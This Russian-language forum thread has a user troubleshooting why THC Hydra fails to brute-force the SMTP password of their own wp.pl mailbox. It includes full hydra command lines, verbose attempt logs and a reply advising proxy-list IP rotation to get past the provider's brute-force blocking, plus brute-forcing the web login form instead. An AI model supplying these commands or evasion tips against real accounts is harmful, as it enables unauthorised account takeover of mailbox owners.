qwertyytrewq1
Member
Тестил гидру на своей почте, вписал в в текстовый файл около 10-ти паролей среди которых был и настоящий, но гидра не нашла ни одного правильного пароля. ))) Брутил "SMTP". В чём проблема, как такое может быть? ))
B правой части каждого сообщения есть стрелки ⇧ и ⇩. Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок ✔ в правой части сообщения.
Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе
какая почта? настройки гидры? логи? всё что угодно может быть епт, опиши нормально проблемуТестил гидру на своей почте, вписал в в текстовый файл около 10-ти паролей среди которых был и настоящий, но гидра не нашла ни одного правильного пароля. ))) Брутил "SMTP". В чём проблема, как такое может быть? ))
Почта: " wp.pl " . Команда целиком: " hydra -S -l *****@wp.pl -P /home/user/Documents/pass.txt -v -V -s 465 smtp.wp.pl smtp ". Проверял свой ящик на майл.ру - сработало, с теми же настройками, "wp.pl" не хочет и всё.. Защита?..какая почта? настройки гидры? логи? всё что угодно может быть епт, опиши нормально проблему
попробуй вербальность больше поставить (-vvv) и скинь логи сюдаПочта: " wp.pl " . Команда целиком: " hydra -S -l *****@wp.pl -P /home/user/Documents/pass.txt -v -V -s 465 smtp.wp.pl smtp ". Проверял свой ящик на майл.ру - сработало, с теми же настройками, "wp.pl" не хочет и всё.. Защита?..
попробуй вербальность больше поставить (-vvv) и скинь логи сюда
hydra -S -l *********@wp.pl -P '/home/user/Документы/Пустой документ' -vvv -s 465 smtp.wp.pl smtp
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2020-04-21 12:39:16
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 8 tasks per 1 server, overall 64 tasks, 8 login tries (l:1/p:8), ~0 tries per task
[DATA] attacking service smtp on port 465 with SSL
[VERBOSE] Resolving addresses ... done
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[STATUS] attack finished for smtp.wp.pl (waiting for children to complete tests)
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-04-21 12:39:21
Bash:hydra -S -l *********@wp.pl -P '/home/user/Документы/Пустой документ' -vvv -s 465 smtp.wp.pl smtp Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2020-04-21 12:39:16 [INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal! [DATA] max 8 tasks per 1 server, overall 64 tasks, 8 login tries (l:1/p:8), ~0 tries per task [DATA] attacking service smtp on port 465 with SSL [VERBOSE] Resolving addresses ... done [VERBOSE] using SMTP LOGIN AUTH mechanism [VERBOSE] using SMTP LOGIN AUTH mechanism [VERBOSE] using SMTP LOGIN AUTH mechanism [VERBOSE] using SMTP LOGIN AUTH mechanism [VERBOSE] using SMTP LOGIN AUTH mechanism [VERBOSE] using SMTP LOGIN AUTH mechanism [VERBOSE] using SMTP LOGIN AUTH mechanism [VERBOSE] using SMTP LOGIN AUTH mechanism [STATUS] attack finished for smtp.wp.pl (waiting for children to complete tests) 1 of 1 target completed, 0 valid passwords found Hydra (http://www.thc.org/thc-hydra) finished at 2020-04-21 12:39:21
Извиняюсь, на сонную голову скопипастил... Сейчас правильно:а зачем -V убрал? с ней показывает каждый логин пароль который подкидывает?
hydra -S -l ********@wp.pl -P '/home/user/Документы/Пустой документ' -vvv -V -s 465 smtp.wp.pl smtp
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2020-04-21 19:21:59
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 8 tasks per 1 server, overall 64 tasks, 8 login tries (l:1/p:8), ~0 tries per task
[DATA] attacking service smtp on port 465 with SSL
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target smtp.wp.pl - login "************@wp.pl" - pass "75jhfu759fj05jkk" - 1 of 8 [child 0]
[ATTEMPT] target smtp.wp.pl - login "************@wp.pl" - pass "75jhfu759fj05uti" - 2 of 8 [child 1]
[ATTEMPT] target smtp.wp.pl - login "************@wp.pl" - pass "bddmfkfrgjgjrgjg" - 3 of 8 [child 2]
[ATTEMPT] target smtp.wp.pl - login "************@wp.pl" - pass "644464hnvnv*****" - 4 of 8 [child 3]
[ATTEMPT] target smtp.wp.pl - login "************@wp.pl" - pass "jfjkrvrjkvrnvjkr" - 5 of 8 [child 4]
[ATTEMPT] target smtp.wp.pl - login "************@wp.pl" - pass "75jhfu759fj05jkk!#" - 6 of 8 [child 5]
[ATTEMPT] target smtp.wp.pl - login "************@wp.pl" - pass "klfjkmkm4kv4kvvkv)" - 7 of 8 [child 6]
[ATTEMPT] target smtp.wp.pl - login "************@wp.pl" - pass "75jhfu759fjo50444u" - 8 of 8 [child 7]
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[STATUS] attack finished for smtp.wp.pl (waiting for children to complete tests)
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-04-21 19:22:04
вроде да, вполне вероятно там защита стоит. наверняка твой ip уходит в блок. надо подключать прокси/vpn. будет время попробую сэмулировать ситуацию у себя. попробуй вместо 'smtp' -> 'smtp-auth' или 'smtps'Извиняюсь, на сонную голову скопипастил... Сейчас правильно:
Bash:hydra -S -l ********@wp.pl -P '/home/user/Документы/Пустой документ' -vvv -V -s 465 smtp.wp.pl smtp Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2020-04-21 19:21:59 [INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal! [DATA] max 8 tasks per 1 server, overall 64 tasks, 8 login tries (l:1/p:8), ~0 tries per task [DATA] attacking service smtp on port 465 with SSL [VERBOSE] Resolving addresses ... done [ATTEMPT] target smtp.wp.pl - login "************@wp.pl" - pass "75jhfu759fj05jkk" - 1 of 8 [child 0] [ATTEMPT] target smtp.wp.pl - login "************@wp.pl" - pass "75jhfu759fj05uti" - 2 of 8 [child 1] [ATTEMPT] target smtp.wp.pl - login "************@wp.pl" - pass "bddmfkfrgjgjrgjg" - 3 of 8 [child 2] [ATTEMPT] target smtp.wp.pl - login "************@wp.pl" - pass "644464hnvnv*****" - 4 of 8 [child 3] [ATTEMPT] target smtp.wp.pl - login "************@wp.pl" - pass "jfjkrvrjkvrnvjkr" - 5 of 8 [child 4] [ATTEMPT] target smtp.wp.pl - login "************@wp.pl" - pass "75jhfu759fj05jkk!#" - 6 of 8 [child 5] [ATTEMPT] target smtp.wp.pl - login "************@wp.pl" - pass "klfjkmkm4kv4kvvkv)" - 7 of 8 [child 6] [ATTEMPT] target smtp.wp.pl - login "************@wp.pl" - pass "75jhfu759fjo50444u" - 8 of 8 [child 7] [VERBOSE] using SMTP LOGIN AUTH mechanism [VERBOSE] using SMTP LOGIN AUTH mechanism [VERBOSE] using SMTP LOGIN AUTH mechanism [VERBOSE] using SMTP LOGIN AUTH mechanism [VERBOSE] using SMTP LOGIN AUTH mechanism [VERBOSE] using SMTP LOGIN AUTH mechanism [VERBOSE] using SMTP LOGIN AUTH mechanism [VERBOSE] using SMTP LOGIN AUTH mechanism [STATUS] attack finished for smtp.wp.pl (waiting for children to complete tests) 1 of 1 target completed, 0 valid passwords found Hydra (http://www.thc.org/thc-hydra) finished at 2020-04-21 19:22:04
Но ip прокси не будет в бан улетать?вроде да, вполне вероятно там защита стоит. наверняка твой ip уходит в блок. надо подключать прокси/vpn. будет время попробую сэмулировать ситуацию у себя. попробуй вместо 'smtp' -> 'smtp-auth' или 'smtps'
и можешь пока просто форму входа побрутить.
в смысле прокси лист подключать и через некоторое количество попыток менять ip. но на таком маленьком словаре всё нормально должно быть. пробовал smpts и smpt-auth?Но ip прокси не будет в бан улетать?
Пробовал, на "smtps" подбирает по кругу (повторно, раз за разом), "smtp-auth" не хочет, пишет что не знает такого.в смысле прокси лист подключать и через некоторое количество попыток менять ip. но на таком маленьком словаре всё нормально должно быть. пробовал smpts и smpt-auth?
Обучение наступательной кибербезопасности в игровой форме. Начать игру!